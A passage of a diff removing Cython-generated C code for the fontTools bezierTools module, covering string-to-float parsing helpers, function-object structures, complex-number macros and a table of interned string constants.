(chr == '.'); - *buffer = (char)chr; - buffer += (chr != '_'); - if (unlikely(chr > 127)) goto parse_failure; - if (unlikely(last_was_punctuation & is_punctuation)) goto parse_failure; - last_was_punctuation = is_punctuation; - } - if (unlikely(last_was_punctuation)) goto parse_failure; - *buffer = '\0'; - return buffer; -parse_failure: - return NULL; -} -static double __Pyx__PyUnicode_AsDouble_inf_nan(const void* data, int kind, Py_ssize_t start, Py_ssize_t length) { - int matches = 1; - Py_UCS4 chr; - Py_UCS4 sign = PyUnicode_READ(kind, data, start); - int is_signed = (sign == '-') | (sign == '+'); - start += is_signed; - length -= is_signed; - switch (PyUnicode_READ(kind, data, start)) { - #ifdef Py_NAN - case 'n': - case 'N': - if (unlikely(length != 3)) goto parse_failure; - chr = PyUnicode_READ(kind, data, start+1); - matches &= (chr == 'a') | (chr == 'A'); - chr = PyUnicode_READ(kind, data, start+2); - matches &= (chr == 'n') | (chr == 'N'); - if (unlikely(!matches)) 
goto parse_failure; - return (sign == '-') ? -Py_NAN : Py_NAN; - #endif - case 'i': - case 'I': - if (unlikely(length < 3)) goto parse_failure; - chr = PyUnicode_READ(kind, data, start+1); - matches &= (chr == 'n') | (chr == 'N'); - chr = PyUnicode_READ(kind, data, start+2); - matches &= (chr == 'f') | (chr == 'F'); - if (likely(length == 3 && matches)) - return (sign == '-') ? -Py_HUGE_VAL : Py_HUGE_VAL; - if (unlikely(length != 8)) goto parse_failure; - chr = PyUnicode_READ(kind, data, start+3); - matches &= (chr == 'i') | (chr == 'I'); - chr = PyUnicode_READ(kind, data, start+4); - matches &= (chr == 'n') | (chr == 'N'); - chr = PyUnicode_READ(kind, data, start+5); - matches &= (chr == 'i') | (chr == 'I'); - chr = PyUnicode_READ(kind, data, start+6); - matches &= (chr == 't') | (chr == 'T'); - chr = PyUnicode_READ(kind, data, start+7); - matches &= (chr == 'y') | (chr == 'Y'); - if (unlikely(!matches)) goto parse_failure; - return (sign == '-') ? -Py_HUGE_VAL : Py_HUGE_VAL; - case '.': case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': - break; - default: - goto parse_failure; - } - return 0.0; -parse_failure: - return -1.0; -} -static double __Pyx_PyUnicode_AsDouble_WithSpaces(PyObject *obj) { - double value; - const char *last; - char *end; - Py_ssize_t start, length = PyUnicode_GET_LENGTH(obj); - const int kind = PyUnicode_KIND(obj); - const void* data = PyUnicode_DATA(obj); - start = 0; - while (Py_UNICODE_ISSPACE(PyUnicode_READ(kind, data, start))) - start++; - while (start < length - 1 && Py_UNICODE_ISSPACE(PyUnicode_READ(kind, data, length - 1))) - length--; - length -= start; - if (unlikely(length <= 0)) goto fallback; - value = __Pyx__PyUnicode_AsDouble_inf_nan(data, kind, start, length); - if (unlikely(value == -1.0)) goto fallback; - if (value != 0.0) return value; - if (length < 40) { - char number[40]; - last = __Pyx__PyUnicode_AsDouble_Copy(data, kind, number, start, start + length); - if 
(unlikely(!last)) goto fallback; - value = PyOS_string_to_double(number, &end, NULL); - } else { - char *number = (char*) PyMem_Malloc((length + 1) * sizeof(char)); - if (unlikely(!number)) goto fallback; - last = __Pyx__PyUnicode_AsDouble_Copy(data, kind, number, start, start + length); - if (unlikely(!last)) { - PyMem_Free(number); - goto fallback; - } - value = PyOS_string_to_double(number, &end, NULL); - PyMem_Free(number); - } - if (likely(end == last) || (value == (double)-1 && PyErr_Occurred())) { - return value; - } -fallback: - return __Pyx_SlowPyString_AsDouble(obj); -} -#endif -static CYTHON_INLINE double __Pyx_PyUnicode_AsDouble(PyObject *obj) { -#if PY_MAJOR_VERSION >= 3 && !CYTHON_COMPILING_IN_PYPY - if (unlikely(__Pyx_PyUnicode_READY(obj) == -1)) - return (double)-1; - if (likely(PyUnicode_IS_ASCII(obj))) { - const char *s; - Py_ssize_t length; - s = PyUnicode_AsUTF8AndSize(obj, &length); - return __Pyx__PyBytes_AsDouble(obj, s, length); - } - return __Pyx_PyUnicode_AsDouble_WithSpaces(obj); -#else - return __Pyx_SlowPyString_AsDouble(obj); -#endif -} - -/* pynumber_float.proto */ -static CYTHON_INLINE PyObject* __Pyx__PyNumber_Float(PyObject* obj); -#define __Pyx_PyNumber_Float(x) (PyFloat_CheckExact(x) ? 
__Pyx_NewRef(x) : __Pyx__PyNumber_Float(x)) - -/* PyFloatBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static int __Pyx_PyFloat_BoolEqObjC(PyObject *op1, PyObject *op2, double floatval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyFloat_BoolEqObjC(op1, op2, floatval, inplace, zerodivision_check)\ - __Pyx_PyObject_IsTrueAndDecref(PyObject_RichCompare(op1, op2, Py_EQ)) - #endif - -/* pow2.proto */ -#define __Pyx_PyNumber_Power2(a, b) PyNumber_Power(a, b, Py_None) - -/* PyIntBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_SubtractCObj(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyInt_SubtractCObj(op1, op2, intval, inplace, zerodivision_check)\ - (inplace ? PyNumber_InPlaceSubtract(op1, op2) : PyNumber_Subtract(op1, op2)) -#endif - -/* RaiseClosureNameError.proto */ -static CYTHON_INLINE void __Pyx_RaiseClosureNameError(const char *varname); - -/* PyMethodNew.proto */ -#if CYTHON_COMPILING_IN_LIMITED_API -static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { - PyObject *typesModule=NULL, *methodType=NULL, *result=NULL; - CYTHON_UNUSED_VAR(typ); - if (!self) - return __Pyx_NewRef(func); - typesModule = PyImport_ImportModule("types"); - if (!typesModule) return NULL; - methodType = PyObject_GetAttrString(typesModule, "MethodType"); - Py_DECREF(typesModule); - if (!methodType) return NULL; - result = PyObject_CallFunctionObjArgs(methodType, func, self, NULL); - Py_DECREF(methodType); - return result; -} -#elif PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { - CYTHON_UNUSED_VAR(typ); - if (!self) - return __Pyx_NewRef(func); - return PyMethod_New(func, self); -} -#else - #define __Pyx_PyMethod_New PyMethod_New -#endif - -/* PyVectorcallFastCallDict.proto */ -#if CYTHON_METH_FASTCALL -static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, 
__pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); -#endif - -/* CythonFunctionShared.proto */ -#define __Pyx_CyFunction_USED -#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 -#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 -#define __Pyx_CYFUNCTION_CCLASS 0x04 -#define __Pyx_CYFUNCTION_COROUTINE 0x08 -#define __Pyx_CyFunction_GetClosure(f)\ - (((__pyx_CyFunctionObject *) (f))->func_closure) -#if PY_VERSION_HEX < 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_CyFunction_GetClassObj(f)\ - (((__pyx_CyFunctionObject *) (f))->func_classobj) -#else - #define __Pyx_CyFunction_GetClassObj(f)\ - ((PyObject*) ((PyCMethodObject *) (f))->mm_class) -#endif -#define __Pyx_CyFunction_SetClassObj(f, classobj)\ - __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) -#define __Pyx_CyFunction_Defaults(type, f)\ - ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) -#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ - ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) -typedef struct { -#if CYTHON_COMPILING_IN_LIMITED_API - PyObject_HEAD - PyObject *func; -#elif PY_VERSION_HEX < 0x030900B1 - PyCFunctionObject func; -#else - PyCMethodObject func; -#endif -#if CYTHON_BACKPORT_VECTORCALL - __pyx_vectorcallfunc func_vectorcall; -#endif -#if PY_VERSION_HEX < 0x030500A0 || CYTHON_COMPILING_IN_LIMITED_API - PyObject *func_weakreflist; -#endif - PyObject *func_dict; - PyObject *func_name; - PyObject *func_qualname; - PyObject *func_doc; - PyObject *func_globals; - PyObject *func_code; - PyObject *func_closure; -#if PY_VERSION_HEX < 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - PyObject *func_classobj; -#endif - void *defaults; - int defaults_pyobjects; - size_t defaults_size; // used by FusedFunction for copying defaults - int flags; - PyObject *defaults_tuple; - PyObject *defaults_kwdict; - PyObject *(*defaults_getter)(PyObject *); - PyObject *func_annotations; - PyObject *func_is_coroutine; -} __pyx_CyFunctionObject; -#undef 
__Pyx_CyOrPyCFunction_Check -#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) -#define __Pyx_CyOrPyCFunction_Check(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) -#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) -static CYTHON_INLINE int __Pyx__IsSameCyOrCFunction(PyObject *func, void *cfunc); -#undef __Pyx_IsSameCFunction -#define __Pyx_IsSameCFunction(func, cfunc) __Pyx__IsSameCyOrCFunction(func, cfunc) -static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, - int flags, PyObject* qualname, - PyObject *closure, - PyObject *module, PyObject *globals, - PyObject* code); -static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); -static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, - size_t size, - int pyobjects); -static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, - PyObject *tuple); -static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, - PyObject *dict); -static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, - PyObject *dict); -static int __pyx_CyFunction_init(PyObject *module); -#if CYTHON_METH_FASTCALL -static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); -static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); -static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); -static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); -#if CYTHON_BACKPORT_VECTORCALL -#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) -#else -#define __Pyx_CyFunction_func_vectorcall(f) 
(((PyCFunctionObject*)f)->vectorcall) -#endif -#endif - -/* CythonFunction.proto */ -static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, - int flags, PyObject* qualname, - PyObject *closure, - PyObject *module, PyObject *globals, - PyObject* code); - -/* ListExtend.proto */ -static CYTHON_INLINE int __Pyx_PyList_Extend(PyObject* L, PyObject* v) { -#if CYTHON_COMPILING_IN_CPYTHON - PyObject* none = _PyList_Extend((PyListObject*)L, v); - if (unlikely(!none)) - return -1; - Py_DECREF(none); - return 0; -#else - return PyList_SetSlice(L, PY_SSIZE_T_MAX, PY_SSIZE_T_MAX, v); -#endif -} - -/* pyfrozenset_new.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyFrozenSet_New(PyObject* it); - -/* PySetContains.proto */ -static CYTHON_INLINE int __Pyx_PySet_ContainsTF(PyObject* key, PyObject* set, int eq); - -/* PyObjectCallMethod0.proto */ -static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); - -/* ValidateBasesTuple.proto */ -#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS -static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); -#endif - -/* PyType_Ready.proto */ -CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); - -/* Import.proto */ -static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); - -/* ImportFrom.proto */ -static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); - -/* ImportDottedModule.proto */ -static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); -#if PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); -#endif - -/* FastTypeChecks.proto */ -#if CYTHON_COMPILING_IN_CPYTHON -#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) -#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) -static 
CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); -static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); -static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); -static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); -#else -#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) -#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) -#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) -#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) -#endif -#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) -#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) - -/* CLineInTraceback.proto */ -#ifdef CYTHON_CLINE_IN_TRACEBACK -#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? 
c_line : 0) -#else -static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); -#endif - -/* CodeObjectCache.proto */ -#if !CYTHON_COMPILING_IN_LIMITED_API -typedef struct { - PyCodeObject* code_object; - int code_line; -} __Pyx_CodeObjectCacheEntry; -struct __Pyx_CodeObjectCache { - int count; - int max_count; - __Pyx_CodeObjectCacheEntry* entries; -}; -static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; -static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); -static PyCodeObject *__pyx_find_code_object(int code_line); -static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); -#endif - -/* AddTraceback.proto */ -static void __Pyx_AddTraceback(const char *funcname, int c_line, - int py_line, const char *filename); - -/* RealImag.proto */ -#if CYTHON_CCOMPLEX - #ifdef __cplusplus - #define __Pyx_CREAL(z) ((z).real()) - #define __Pyx_CIMAG(z) ((z).imag()) - #else - #define __Pyx_CREAL(z) (__real__(z)) - #define __Pyx_CIMAG(z) (__imag__(z)) - #endif -#else - #define __Pyx_CREAL(z) ((z).real) - #define __Pyx_CIMAG(z) ((z).imag) -#endif -#if defined(__cplusplus) && CYTHON_CCOMPLEX\ - && (defined(_WIN32) || defined(__clang__) || (defined(__GNUC__) && (__GNUC__ >= 5 || __GNUC__ == 4 && __GNUC_MINOR__ >= 4 )) || __cplusplus >= 201103) - #define __Pyx_SET_CREAL(z,x) ((z).real(x)) - #define __Pyx_SET_CIMAG(z,y) ((z).imag(y)) -#else - #define __Pyx_SET_CREAL(z,x) __Pyx_CREAL(z) = (x) - #define __Pyx_SET_CIMAG(z,y) __Pyx_CIMAG(z) = (y) -#endif - -/* Arithmetic.proto */ -#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) - #define __Pyx_c_eq_double(a, b) ((a)==(b)) - #define __Pyx_c_sum_double(a, b) ((a)+(b)) - #define __Pyx_c_diff_double(a, b) ((a)-(b)) - #define __Pyx_c_prod_double(a, b) ((a)*(b)) - #define __Pyx_c_quot_double(a, b) ((a)/(b)) - #define __Pyx_c_neg_double(a) (-(a)) - #ifdef __cplusplus - #define __Pyx_c_is_zero_double(z) ((z)==(double)0) - #define 
__Pyx_c_conj_double(z) (::std::conj(z)) - #if 1 - #define __Pyx_c_abs_double(z) (::std::abs(z)) - #define __Pyx_c_pow_double(a, b) (::std::pow(a, b)) - #endif - #else - #define __Pyx_c_is_zero_double(z) ((z)==0) - #define __Pyx_c_conj_double(z) (conj(z)) - #if 1 - #define __Pyx_c_abs_double(z) (cabs(z)) - #define __Pyx_c_pow_double(a, b) (cpow(a, b)) - #endif - #endif -#else - static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex); - static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex); - #if 1 - static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex, __pyx_t_double_complex); - #endif -#endif - -/* FromPy.proto */ -static __pyx_t_double_complex __Pyx_PyComplex_As___pyx_t_double_complex(PyObject*); - -/* ToPy.proto */ -#define __pyx_PyComplex_FromComplex(z)\ - PyComplex_FromDoubles((double)__Pyx_CREAL(z),\ - (double)__Pyx_CIMAG(z)) - -/* GCCDiagnostics.proto */ -#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) -#define __Pyx_HAS_GCC_DIAGNOSTIC -#endif - -/* CIntToPy.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); - -/* FormatTypeName.proto */ -#if CYTHON_COMPILING_IN_LIMITED_API -typedef 
PyObject *__Pyx_TypeName; -#define __Pyx_FMT_TYPENAME "%U" -static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); -#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) -#else -typedef const char *__Pyx_TypeName; -#define __Pyx_FMT_TYPENAME "%.200s" -#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) -#define __Pyx_DECREF_TypeName(obj) -#endif - -/* CIntFromPy.proto */ -static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); - -/* CIntFromPy.proto */ -static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); - -/* CheckBinaryVersion.proto */ -static unsigned long __Pyx_get_runtime_version(); -static int __Pyx_check_binary_version(unsigned long ct_version, unsigned long rt_version, int allow_newer); - -/* InitStrings.proto */ -static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); - -/* #### Code section: module_declarations ### */ - -/* Module declarations from "cython" */ - -/* Module declarations from "fontTools.misc.bezierTools" */ -static CYTHON_INLINE double __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_t_double_complex, __pyx_t_double_complex); /*proto*/ -static CYTHON_INLINE double __pyx_f_9fontTools_4misc_11bezierTools__intSecAtan(double); /*proto*/ -static CYTHON_INLINE PyObject *__pyx_f_9fontTools_4misc_11bezierTools_calcCubicParametersC(__pyx_t_double_complex, __pyx_t_double_complex, __pyx_t_double_complex, __pyx_t_double_complex); /*proto*/ -static CYTHON_INLINE PyObject *__pyx_f_9fontTools_4misc_11bezierTools_calcCubicPointsC(__pyx_t_double_complex, __pyx_t_double_complex, __pyx_t_double_complex, __pyx_t_double_complex); /*proto*/ -/* #### Code section: typeinfo ### */ -/* #### Code section: before_global_var ### */ -#define __Pyx_MODULE_NAME "fontTools.misc.bezierTools" -extern int __pyx_module_is_main_fontTools__misc__bezierTools; -int __pyx_module_is_main_fontTools__misc__bezierTools = 0; - -/* Implementation of "fontTools.misc.bezierTools" */ -/* #### Code section: global_var ### */ -static PyObject *__pyx_builtin_AttributeError; -static 
PyObject *__pyx_builtin_ImportError; -static PyObject *__pyx_builtin_range; -static PyObject *__pyx_builtin_round; -static PyObject *__pyx_builtin_ValueError; -static PyObject *__pyx_builtin_TypeError; -static PyObject *__pyx_builtin_print; -/* #### Code section: string_decls ### */ -static const char __pyx_k_Q[] = "Q"; -static const char __pyx_k_R[] = "R"; -static const char __pyx_k_a[] = "a"; -static const char __pyx_k_b[] = "b"; -static const char __pyx_k_c[] = "c"; -static const char __pyx_k_d[] = "d"; -static const char __pyx_k_e[] = "e"; -static const char __pyx_k_g[] = "%g"; -static const char __pyx_k_i[] = "i"; -static const char __pyx_k_n[] = "n"; -static const char __pyx_k_r[] = "r"; -static const char __pyx_k_s[] = "s"; -static const char __pyx_k_t[] = "t"; -static const char __pyx_k_x[] = "x"; -static const char __pyx_k_y[] = "y"; -static const char __pyx_k_DD[] = "DD"; -static const char __pyx_k_Q3[] = "Q3"; -static const char __pyx_k_R2[] = "R2"; -static const char __pyx_k__9[] = ", "; -static const char __pyx_k_a1[] = "a1"; -static const char __pyx_k_a2[] = "a2"; -static const char __pyx_k_a3[] = "a3"; -static const char __pyx_k_ax[] = "ax"; -static const char __pyx_k_ay[] = "ay"; -static const char __pyx_k_b1[] = "b1"; -static const char __pyx_k_bx[] = "bx"; -static const char __pyx_k_by[] = "by"; -static const char __pyx_k_c1[] = "c1"; -static const char __pyx_k_cx[] = "cx"; -static const char __pyx_k_cy[] = "cy"; -static const char __pyx_k_d0[] = "d0"; -static const char __pyx_k_d1[] = "d1"; -static const char __pyx_k_dx[] = "dx"; -static const char __pyx_k_dy[] = "dy"; -static const char __pyx_k_e1[] = "e1"; -static const char __pyx_k_e2[] = "e2"; -static const char __pyx_k_ex[] = "ex"; -static const char __pyx_k_ey[] = "ey"; -static const char __pyx_k_gc[] = "gc"; -static const char __pyx_k_it[] = "it"; -static const char __pyx_k_p0[] = "p0"; -static const char __pyx_k_p1[] = "p1"; -static const char __pyx_k_p2[] = "p2"; -static const char 
__pyx_k_p3[] = "p3"; -static const char __pyx_k_pi[] = "pi"; -static const char __pyx_k_pt[] = "pt"; -static const char __pyx_k_px[] = "px"; -static const char __pyx_k_py[] = "py"; -static const char __pyx_k_s1[] = "s1"; -static const char __pyx_k_s2[] = "s2"; -static const char __pyx_k_sx[] = "sx"; -static const char __pyx_k_sy[] = "sy"; -static const char __pyx_k_t1[] = "t1"; -static const char __pyx_k_t2[] = "t2"; -static const char __pyx_k_ts[] = "ts"; -static const char __pyx_k_v0[] = "v0"; -static const char __pyx_k_v1[] = "v1"; -static const char __pyx_k_v2[] = "v2"; -static const char __pyx_k_v3[] = "v3"; -static const char __pyx_k_v4[] = "v4"; -static const char __pyx_k_x0[] = "x0"; -static const char __pyx_k_x1[] = "x1"; -static const char __pyx_k_x2[] = "x2"; -static const char __pyx_k_x3[] = "x3"; -static const char __pyx_k_x4[] = "x4"; -static const char __pyx_k_y1[] = "y1"; -static const char __pyx_k_y2[] = "y2"; -static const char __pyx_k_y3[] = "y3"; -static const char __pyx_k_y4[] = "y4"; -static const char __pyx_k_1_t[] = "_1_t"; -static const char __pyx_k_Len[] = "Len"; -static const char __pyx_k__10[] = "."; -static const char __pyx_k__11[] = "*"; -static const char __pyx_k__91[] = "_"; -static const char __pyx_k_a1x[] = "a1x"; -static const char __pyx_k_a1y[] = "a1y"; -static const char __pyx_k_all[] = "__all__"; -static const char __pyx_k_ax2[] = "ax2"; -static const char __pyx_k_ax3[] = "ax3"; -static const char __pyx_k_ay2[] = "ay2"; -static const char __pyx_k_ay3[] = "ay3"; -static const char __pyx_k_b1x[] = "b1x"; -static const char __pyx_k_b1y[] = "b1y"; -static const char __pyx_k_box[] = "box"; -static const char __pyx_k_bx2[] = "bx2"; -static const char __pyx_k_by2[] = "by2"; -static const char __pyx_k_c11[] = "c11"; -static const char __pyx_k_c12[] = "c12"; -static const char __pyx_k_c1x[] = "c1x"; -static const char __pyx_k_c1y[] = "c1y"; -static const char __pyx_k_c21[] = "c21"; -static const char __pyx_k_c22[] = "c22"; -static const 
char __pyx_k_cos[] = "cos"; -static const char __pyx_k_d1x[] = "d1x"; -static const char __pyx_k_d1y[] = "d1y"; -static const char __pyx_k_e1x[] = "e1x"; -static const char __pyx_k_e1y[] = "e1y"; -static const char __pyx_k_e2x[] = "e2x"; -static const char __pyx_k_e2y[] = "e2y"; -static const char __pyx_k_end[] = "end"; -static const char __pyx_k_key[] = "key"; -static const char __pyx_k_mid[] = "mid"; -static const char __pyx_k_obj[] = "obj"; -static const char __pyx_k_one[] = "one"; -static const char __pyx_k_pt1[] = "pt1"; -static const char __pyx_k_pt2[] = "pt2"; -static const char __pyx_k_pt3[] = "pt3"; -static const char __pyx_k_pt4[] = "pt4"; -static const char __pyx_k_rDD[] = "rDD"; -static const char __pyx_k_rQ2[] = "rQ2"; -static const char __pyx_k_s1x[] = "s1x"; -static const char __pyx_k_s1y[] = "s1y"; -static const char __pyx_k_s2x[] = "s2x"; -static const char __pyx_k_s2y[] = "s2y"; -static const char __pyx_k_s_2[] = "(%s)"; -static const char __pyx_k_seg[] = "seg"; -static const char __pyx_k_sys[] = "sys"; -static const char __pyx_k_two[] = "two"; -static const char __pyx_k__103[] = "?"; -static const char __pyx_k_a1_3[] = "a1_3"; -static const char __pyx_k_acos[] = "acos"; -static const char __pyx_k_arch[] = "arch"; -static const char __pyx_k_args[] = "args"; -static const char __pyx_k_exit[] = "exit"; -static const char __pyx_k_line[] = "line"; -static const char __pyx_k_main[] = "__main__"; -static const char __pyx_k_math[] = "math"; -static const char __pyx_k_mult[] = "mult"; -static const char __pyx_k_name[] = "__name__"; -static const char __pyx_k_off1[] = "off1"; -static const char __pyx_k_off2[] = "off2"; -static const char __pyx_k_pt1x[] = "pt1x"; -static const char __pyx_k_pt1y[] = "pt1y"; -static const char __pyx_k_pt2x[] = "pt2x"; -static const char __pyx_k_pt2y[] = "pt2y"; -static const char __pyx_k_seen[] = "seen"; -static const char __pyx_k_seg1[] = "seg1"; -static const char __pyx_k_seg2[] = "seg2"; -static const char __pyx_k_send[] = 
"send"; -static const char __pyx_k_spec[] = "__spec__"; -static const char __pyx_k_sqrt[] = "sqrt"; -static const char __pyx_k_t1_2[] = "t1_2"; -static const char __pyx_k_t1_3[] = "t1_3"; -static const char __pyx_k_test[] = "__test__"; -static const char __pyx_k_1_t_2[] = "_1_t_2"; -static const char __pyx_k_R2_Q3[] = "R2_Q3"; -static const char __pyx_k_angle[] = "angle"; -static const char __pyx_k_asinh[] = "asinh"; -static const char __pyx_k_atan2[] = "atan2"; -static const char __pyx_k_close[] = "close"; -static const char __pyx_k_curve[] = "curve"; -static const char __pyx_k_delta[] = "delta"; -static const char __pyx_k_found[] = "found"; -static const char __pyx_k_midPt[] = "midPt"; -static const char __pyx_k_print[] = "print"; -static const char __pyx_k_range[] = "range"; -static const char __pyx_k_roots[] = "roots"; -static const char __pyx_k_round[] = "round"; -static const char __pyx_k_scale[] = "scale"; -static const char __pyx_k_start[] = "start"; -static const char __pyx_k_theta[] = "theta"; -static const char __pyx_k_throw[] = "throw"; -static const char __pyx_k_where[] = "where"; -static const char __pyx_k_xDiff[] = "xDiff"; -static const char __pyx_k_yDiff[] = "yDiff"; -static const char __pyx_k_append[] = "append"; -static const char __pyx_k_curve1[] = "curve1"; -static const char __pyx_k_curve2[] = "curve2"; -static const char __pyx_k_cython[] = "cython"; -static const char __pyx_k_deriv3[] = "deriv3"; -static const char __pyx_k_enable[] = "enable"; -static const char __pyx_k_failed[] = "failed"; -static const char __pyx_k_import[] = "__import__"; -static const char __pyx_k_insert[] = "insert"; -static const char __pyx_k_line_t[] = "line_t"; -static const char __pyx_k_origin[] = "origin"; -static const char __pyx_k_points[] = "points"; -static const char __pyx_k_range1[] = "range1"; -static const char __pyx_k_range2[] = "range2"; -static const char __pyx_k_rotate[] = "rotate"; -static const char __pyx_k_xRoots[] = "xRoots"; -static const char 
__pyx_k_yRoots[] = "yRoots"; -static const char __pyx_k_2_t_1_t[] = "_2_t_1_t"; -static const char __pyx_k_bounds1[] = "bounds1"; -static const char __pyx_k_bounds2[] = "bounds2"; -static const char __pyx_k_delta_2[] = "delta_2"; -static const char __pyx_k_delta_3[] = "delta_3"; -static const char __pyx_k_disable[] = "disable"; -static const char __pyx_k_doctest[] = "doctest"; -static const char __pyx_k_epsilon[] = "epsilon"; -static const char __pyx_k_genexpr[] = "genexpr"; -static const char __pyx_k_isclose[] = "isclose"; -static const char __pyx_k_segment[] = "segment"; -static const char __pyx_k_slope12[] = "slope12"; -static const char __pyx_k_slope34[] = "slope34"; -static const char __pyx_k_swapped[] = "swapped"; -static const char __pyx_k_testmod[] = "testmod"; -static const char __pyx_k_COMPILED[] = "COMPILED"; -static const char __pyx_k_Identity[] = "Identity"; -static const char __pyx_k_midpoint[] = "midpoint"; 